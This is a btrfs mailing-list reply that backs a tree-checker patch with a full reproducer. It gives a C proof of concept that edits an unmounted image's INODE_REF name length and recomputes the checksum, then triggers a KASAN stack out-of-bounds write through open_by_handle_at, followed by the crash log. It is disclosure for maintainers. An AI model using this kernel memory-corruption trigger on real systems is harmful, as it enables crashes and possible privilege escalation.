From: Weiming Shi <bestswngs@gmail.com>
To: linux-btrfs@vger.kernel.org
Cc: dsterba@suse.com, josef@toxicpanda.com, clm@fb.com, xmei5@asu.edu
Subject: Re: [PATCH v2] btrfs: tree-checker: validate inode_ref and root_ref name lengths
Date: Wed, 10 Jun 2026 18:45:06 +0800 [thread overview]
Message-ID: <aik0hEV6ehKx6Ldv@Air.local> (raw)
In-Reply-To: <20260608083509.3907960-2-bestswngs@gmail.com>
Reproduction:
Required kernel configuration:
```
CONFIG_BTRFS_FS=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y
CONFIG_KASAN_STACK=y
CONFIG_STACKPROTECTOR_STRONG=y
```
Steps to reproduce:
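1. Create a btrfs filesystem image (the QEMU command in step 2 expects it at /tmp/base.img, so pass that path as the first argument):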
```
#!/bin/sh
# Create a fresh, empty btrfs image file.
#   $1  output path (default: base.img)
#   $2  image size as understood by truncate(1) (default: 512M)
set -e

OUT="${1:-base.img}"
SIZE="${2:-512M}"

# Start from a clean sparse file of the requested size.
rm -f "$OUT"
truncate -s "$SIZE" "$OUT"

mkfs.btrfs -f "$OUT" >/dev/null
echo "wrote clean btrfs image: $OUT ($SIZE)"
```
2. Then run QEMU with the image
```
qemu-system-x86_64 -enable-kvm -cpu host -m 4G -smp 2 -nographic -no-reboot \
-kernel kernel/test-bzImage-kasan \
-initrd env/initramfs-selfcontained.cpio.gz \
-drive file=/tmp/base.img,if=virtio,format=raw,snapshot=on \
-append "console=ttyS0 rdinit=/init nokaslr kasan.fault=panic"
```
3. Run the PoC
```c
// Build: gcc -O2 -static -o poc poc_selfcontained.c
// Run : attach a freshly `mkfs.btrfs`-ed image as DEV (default /dev/vda)
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/mman.h>
#ifndef DEV
#define DEV "/dev/vda"
#endif
#define MNT "/mnt"
#define HDR 0x65 // sizeof(struct btrfs_header)
#define ITEM 25 // sizeof(struct btrfs_item)
#define IREF 10 // sizeof(struct btrfs_inode_ref): u64 index + u16 name_len
#define SECTOR 4096
#define KEY_INODE_REF 12 // BTRFS_INODE_REF_KEY
#define TARGET_NAME_LEN 4096
/*
 * Bit-at-a-time CRC-32C of the n bytes starting at p.
 *
 * Uses the reflected polynomial 0x82F63B78 with an all-ones initial value
 * and a final bitwise inversion.  An empty input yields 0.
 */
static uint32_t crc32c(const uint8_t *p, size_t n)
{
	uint32_t acc = 0xFFFFFFFFu;

	while (n--) {
		acc ^= *p++;
		for (int bit = 8; bit > 0; bit--) {
			uint32_t lsb = acc & 1u;

			acc >>= 1;
			if (lsb)
				acc ^= 0x82F63B78u;
		}
	}
	return acc ^ 0xFFFFFFFFu;
}
/*
 * Alignment-safe accessors for raw byte buffers.  Values are copied with
 * memcpy() in host byte order; no endianness conversion is performed.
 */

/* Read the 8 bytes at p as a uint64_t. */
static uint64_t rd64(const uint8_t *p)
{
	uint64_t out;

	memcpy(&out, p, sizeof out);
	return out;
}

/* Read the 4 bytes at p as a uint32_t. */
static uint32_t rd32(const uint8_t *p)
{
	uint32_t out;

	memcpy(&out, p, sizeof out);
	return out;
}

/* Store v into the 4 bytes at p. */
static void wr32(uint8_t *p, uint32_t v)
{
	memcpy(p, &v, sizeof v);
}

/* Store v into the 2 bytes at p. */
static void wr16(uint8_t *p, uint16_t v)
{
	memcpy(p, &v, sizeof v);
}
/*
 * A struct file_handle header immediately followed by 64 bytes of storage.
 * main() advertises sizeof buf as handle_bytes, so buf is presumably where
 * the kernel-written handle payload ends up.
 */
struct fh {
	struct file_handle h;
	unsigned char buf[64];
};
// Rewrite d's INODE_REF item on the raw device (every DUP copy of the leaf).
//
// Maps the whole device, scans it in SECTOR steps for level-0 tree blocks
// carrying the superblock's fsid, and in each one looks for the item keyed
// (d_ino, KEY_INODE_REF, sub_ino) whose size is IREF + 1.  That item is grown
// to IREF + TARGET_NAME_LEN bytes, its name_len field is set to
// TARGET_NAME_LEN, and the leaf checksum is recomputed.
//
//   dev      path of the (unmounted) device or image to patch
//   d_ino    objectid of the item key (inode number of the directory "d")
//   sub_ino  key offset of the item (inode number of the parent directory)
//
// Returns the number of leaves patched (0 if none matched), or -1 on any
// error (open/lseek/mmap/msync failure, bad magic, implausible geometry).
static int patch_device(const char *dev, uint64_t d_ino, uint64_t sub_ino)
{
	int patched = -1;
	uint8_t fsid[16];
	uint32_t nodesize;

	int fd = open(dev, O_RDWR);
	if (fd < 0) { perror("open dev"); return -1; }

	off_t sz = lseek(fd, 0, SEEK_END);
	if (sz < 0) { perror("lseek"); close(fd); return -1; }
	// The superblock fields read below end at 64K + 0x98 (nodesize is 4 bytes).
	if (sz < (off_t)(0x10000 + 0x98)) {
		fprintf(stderr, "device too small for a btrfs superblock\n");
		close(fd);
		return -1;
	}

	uint8_t *m = mmap(NULL, (size_t)sz, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
	if (m == MAP_FAILED) { perror("mmap"); close(fd); return -1; }

	// superblock @ 64K: magic@+0x40, fsid@+0x20, nodesize@+0x94
	const uint8_t *sb = m + 0x10000;
	if (memcmp(sb + 0x40, "_BHRfS_M", 8)) { fprintf(stderr,"bad btrfs magic\n"); goto out; }
	memcpy(fsid, sb + 0x20, 16);
	nodesize = rd32(sb + 0x94);
	// A tree block must at least hold its header and one item header.
	if (nodesize < HDR + ITEM) { fprintf(stderr, "bad nodesize\n"); goto out; }

	patched = 0;
	for (off_t off = 0; off + (off_t)nodesize <= sz; off += SECTOR) {
		if (memcmp(m + off + 0x20, fsid, 16)) continue;   // same filesystem
		if (m[off + 0x64] != 0) continue;                 // leaf (level 0)
		uint32_t nritems = rd32(m + off + 0x60);
		if (!nritems || nritems > 2000) continue;
		// The item-header array must fit inside this block, otherwise the
		// scans below would read past the candidate leaf.
		if ((uint64_t)HDR + (uint64_t)ITEM * nritems > nodesize) continue;

		// Item data offsets are relative to the end of the block header.
		uint32_t leaf_data = nodesize - HDR;

		for (uint32_t i = 0; i < nritems; i++) {
			off_t ip = off + HDR + (off_t)i * ITEM;
			if (rd64(m+ip) != d_ino || m[ip+8] != KEY_INODE_REF ||
			    rd64(m+ip+9) != sub_ino)
				continue;
			uint32_t ioff = rd32(m+ip+17), isize = rd32(m+ip+21);
			if (isize != IREF + 1) continue;   // expect the "d" entry (len 1)
			// Reject an item whose data would lie outside the block.
			if (ioff > leaf_data - isize) continue;

			uint32_t new_size = IREF + TARGET_NAME_LEN;   // 4106
			uint32_t delta    = new_size - isize;         // 4095

			// start of the packed data region = lowest item data offset
			// (never above ioff, since item i takes part in the minimum)
			uint32_t data_end = nodesize;
			for (uint32_t j = 0; j < nritems; j++) {
				uint32_t o = rd32(m+off+HDR+(off_t)j*ITEM+17);
				if (o < data_end) data_end = o;
			}
			// Free space is the gap between the item headers and the data
			// region; test the headers first so the subtraction cannot wrap.
			if (ITEM*nritems > data_end || delta > data_end - ITEM*nritems) {
				fprintf(stderr,"no room\n");
				continue;
			}

			// grow item i: shift the data of items at offset <= ioff down by delta
			uint8_t *base = m + off + HDR;
			memmove(base + data_end - delta, base + data_end,
				(ioff + isize) - data_end);
			for (uint32_t j = 0; j < nritems; j++) {
				off_t jp = off + HDR + (off_t)j * ITEM;
				uint32_t o = rd32(m+jp+17);
				if (o <= ioff) wr32(m+jp+17, o - delta);
			}
			wr32(m + ip + 21, new_size);                        // item size 11 -> 4106
			wr16(base + (ioff - delta) + 8, TARGET_NAME_LEN);   // name_len 1 -> 4096
			wr32(m + off, crc32c(m + off + 0x20, nodesize - 0x20)); // leaf csum
			patched++;
			break;   // one matching item per leaf; keep scanning for DUP copies
		}
	}

	// If the flush fails the edits may never have reached the device.
	if (msync(m, (size_t)sz, MS_SYNC)) { perror("msync"); patched = -1; }
out:
	munmap(m, (size_t)sz);
	close(fd);
	return patched;
}
/*
 * PoC driver:
 *   1. mount DEV on MNT, create /sub/d and record both inode numbers;
 *   2. obtain a file handle for /sub/d, then sync and unmount;
 *   3. patch d's INODE_REF on the raw device via patch_device();
 *   4. remount and call open_by_handle_at() on the saved handle.
 *
 * Returns 0 when the final open_by_handle_at() call returns (whatever its
 * result) and 1 if any setup step fails.
 */
int main(void)
{
	struct fh fh; int mid; struct stat st;
	uint64_t d_ino, sub_ino;

	mkdir(MNT, 0755);   /* result ignored: a failure shows up in mount() below */
	if (mount(DEV, MNT, "btrfs", 0, NULL)) { perror("mount #1"); return 1; }
	mkdir(MNT "/sub", 0755);   /* result ignored: a missing /sub fails the next mkdir */
	if (mkdir(MNT "/sub/d", 0755)) { perror("mkdir /sub/d"); return 1; }

	/* The inode numbers select the on-disk item to patch, so a failed
	 * stat() must not be allowed to feed garbage into patch_device(). */
	if (stat(MNT "/sub", &st)) { perror("stat /sub"); return 1; }
	sub_ino = st.st_ino;
	if (stat(MNT "/sub/d", &st)) { perror("stat /sub/d"); return 1; }
	d_ino = st.st_ino;
	printf("[poc] created /sub/d (sub_ino=%lu d_ino=%lu)\n",
	       (unsigned long)sub_ino, (unsigned long)d_ino);

	fh.h.handle_bytes = sizeof fh.buf;
	if (name_to_handle_at(AT_FDCWD, MNT "/sub/d", &fh.h, &mid, 0)) {
		perror("name_to_handle_at"); return 1;
	}
	printf("[poc] obtained file handle for /sub/d (%u bytes)\n", fh.h.handle_bytes);

	sync();
	/* Never rewrite the raw device while the filesystem is still mounted. */
	if (umount(MNT)) { perror("umount"); return 1; }

	int n = patch_device(DEV, d_ino, sub_ino);
	printf("[poc] rewrote %d on-disk INODE_REF copy/ies: name_len 1 -> %d, "
	       "item 11 -> %d bytes\n", n, TARGET_NAME_LEN, IREF + TARGET_NAME_LEN);
	if (n < 1) { fprintf(stderr, "[poc] nothing patched\n"); return 1; }

	if (mount(DEV, MNT, "btrfs", 0, NULL)) { perror("mount #2"); return 1; }
	int mfd = open(MNT, O_RDONLY | O_DIRECTORY);
	if (mfd < 0) { perror("open mnt"); return 1; }

	puts("[poc] open_by_handle_at(/sub/d) -> reconnect_path -> btrfs_get_name "
	     "(expect stack-OOB on a vulnerable kernel)");
	int r = open_by_handle_at(mfd, &fh.h, O_RDONLY | O_DIRECTORY);
	if (r < 0)
		printf("[poc] open_by_handle_at: %s -- no crash, kernel is PATCHED\n",
		       strerror(errno));
	else
		puts("[poc] open_by_handle_at succeeded (unexpected)");
	return 0;
}
```
4. Observe the crash
```
[ 23.447577][ T178] BUG: KASAN: stack-out-of-bounds in read_extent_buffer+0x2b4/0x3c0
k-OOB on a vulne[ 23.447983][ T178] Write of size 633 at addr ffff88810a67fbc0 by task poc/178
rable kernel)
[ 23.448358][ T178]
[ 23.448523][ T178] CPU: 1 UID: 0 PID: 178 Comm: poc Tainted: G W 7.1.0-rc2+ #166 PREEMPT(lazy) 94e7405e6ff72f9547adbe151fef187ff71238a
[ 23.448527][ T178] Tainted: [W]=WARN
[ 23.448527][ T178] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 23.448529][ T178] Call Trace:
[ 23.448530][ T178] <TASK>
[ 23.448531][ T178] dump_stack_lvl+0x93/0x100
[ 23.448535][ T178] print_address_description.constprop.0+0x30/0x400
[ 23.448537][ T178] ? __virt_addr_valid+0x228/0x440
[ 23.448540][ T178] ? read_extent_buffer+0x2b4/0x3c0
[ 23.448542][ T178] print_report+0xc4/0x2c0
[ 23.448544][ T178] ? __virt_addr_valid+0x237/0x440
[ 23.448546][ T178] ? read_extent_buffer+0x2b4/0x3c0
[ 23.448548][ T178] kasan_report+0xf8/0x140
[ 23.448550][ T178] ? read_extent_buffer+0x2b4/0x3c0
[ 23.448553][ T178] kasan_check_range+0x119/0x200
[ 23.448555][ T178] __asan_memcpy+0x3c/0x80
[ 23.448558][ T178] read_extent_buffer+0x2b4/0x3c0
[ 23.448561][ T178] btrfs_get_name+0x333/0x600
[ 23.448564][ T178] ? __pfx_btrfs_get_name+0x40/0x40
[ 23.448566][ T178] ? __lock_acquire+0x4f9/0xc00
[ 23.448570][ T178] reconnect_one+0x17e/0x580
[ 23.448572][ T178] ? __pfx_reconnect_one+0x40/0x40
[ 23.448574][ T178] ? trace_preempt_enable+0xac/0x180
[ 23.448576][ T178] ? _raw_spin_unlock+0x2d/0x80
[ 23.448578][ T178] ? trace_preempt_on+0x2c/0x40
[ 23.448581][ T178] reconnect_path+0x20c/0x2c0
[ 23.448583][ T178] ? __pfx_vfs_dentry_acceptable+0x40/0x40
[ 23.448586][ T178] exportfs_decode_fh_raw+0x5a3/0x880
[ 23.448588][ T178] ? __pfx_exportfs_decode_fh_raw+0x40/0x40
[ 23.448594][ T178] ? __might_fault+0xad/0x140
[ 23.448596][ T178] ? __lock_release.isra.0+0x5d/0x180
[ 23.448598][ T178] ? __might_fault+0xad/0x140
[ 23.448601][ T178] handle_to_path+0x524/0x880
[ 23.448603][ T178] ? __pfx_handle_to_path+0x40/0x40
[ 23.448606][ T178] ? entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 23.448608][ T178] ? lockdep_hardirqs_on+0x7f/0x140
[ 23.448611][ T178] ? do_handle_open+0x7e/0x200
[ 23.448613][ T178] do_handle_open+0x7e/0x200
[ 23.448615][ T178] ? __pfx_do_handle_open+0x40/0x40
[ 23.448617][ T178] ? rcu_is_watching+0x15/0xc0
[ 23.448619][ T178] ? do_syscall_64+0x129/0xf00
[ 23.448621][ T178] ? trace_preempt_enable+0xac/0x180
[ 23.448623][ T178] do_syscall_64+0x17a/0xf00
[ 23.448625][ T178] ? do_syscall_64+0x129/0xf00
[ 23.448626][ T178] ? clear_bhb_loop+0x60/0xc0
[ 23.448628][ T178] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 23.448630][ T178] RIP: 0033:0x41bf74
[ 23.448632][ T178] Code: 89 02 48 c7 c0 ff ff ff ff eb b4 e8 e6 08 00 00 66 0f 1f 44 00 00 f3 0f 1e fa 80 3d ed 80 09 00 00 74 13 b8 30 01 00 00 0f 05 5
[ 23.448634][ T178] RSP: 002b:00007fffce51fac8 EFLAGS: 00000202 ORIG_RAX: 0000000000000130
[ 23.448636][ T178] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 000000000041bf74
[ 23.448638][ T178] RDX: 0000000000010000 RSI: 00007fffce51fb30 RDI: 0000000000000003
[ 23.448639][ T178] RBP: 0000000000000003 R08: 0000000000000000 R09: 0000000000000000
[ 23.448640][ T178] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000102
[ 23.448641][ T178] R13: 0000000000000003 R14: 00007fffce51fb30 R15: 00007fffce51fc10
[ 23.448644][ T178] </TASK>
[ 23.448645][ T178]
[ 23.462123][ T178] The buggy address belongs to stack of task poc/178
[ 23.462403][ T178] and is located at offset 64 in frame:
[ 23.462639][ T178] exportfs_decode_fh_raw+0x0/0x880
[ 23.462860][ T178]
[ 23.462961][ T178] This frame has 2 objects:
[ 23.463159][ T178] [32, 48) 'path'
[ 23.463161][ T178] [64, 320) 'nbuf'
[ 23.463320][ T178]
[ 23.463582][ T178] The buggy address belongs to the physical page:
[ 23.463852][ T178] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10a67f
[ 23.464228][ T178] flags: 0x17ffffc0000000(node=0|zone=2|lastcpupid=0x1fffff)
[ 23.464540][ T178] raw: 0017ffffc0000000 ffffea0004299fc8 ffffea0004299fc8 0000000000000000
[ 23.464899][ T178] raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000
[ 23.465263][ T178] page dumped because: kasan: bad access detected
[ 23.465532][ T178]
[ 23.465633][ T178] Memory state around the buggy address:
[ 23.465869][ T178] ffff88810a67fb80: f1 f1 f1 f1 00 00 f2 f2 00 00 00 00 00 00 00 00
[ 23.466212][ T178] ffff88810a67fc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 23.466549][ T178] >ffff88810a67fc80: 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3
[ 23.466886][ T178] ^
[ 23.467152][ T178] ffff88810a67fd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 23.467489][ T178] ffff88810a67fd80: f1 f1 f1 f1 00 00 00 f2 f2 f2 f2 f2 00 f3 f3 f3
[ 23.467826][ T178] ==================================================================
[ 23.468184][ T178] Kernel panic - not syncing: kasan.fault=panic set ...
```
next prev parent reply other threads:[~2026-06-10 10:45 UTC|newest]
Thread overview: 4+ messages / expand[flat|nested] mbox.gz Atom feed top
2026-06-08 8:35 [PATCH v2] btrfs: tree-checker: validate inode_ref and root_ref name lengths Weiming Shi
2026-06-08 9:19 ` Qu Wenruo
2026-06-10 10:45 ` Weiming Shi [this message]
2026-06-10 11:26 ` Qu Wenruo
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=aik0hEV6ehKx6Ldv@Air.local \
--to=bestswngs@gmail.com \
--cc=clm@fb.com \
--cc=dsterba@suse.com \
--cc=josef@toxicpanda.com \
--cc=linux-btrfs@vger.kernel.org \
--cc=xmei5@asu.edu \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox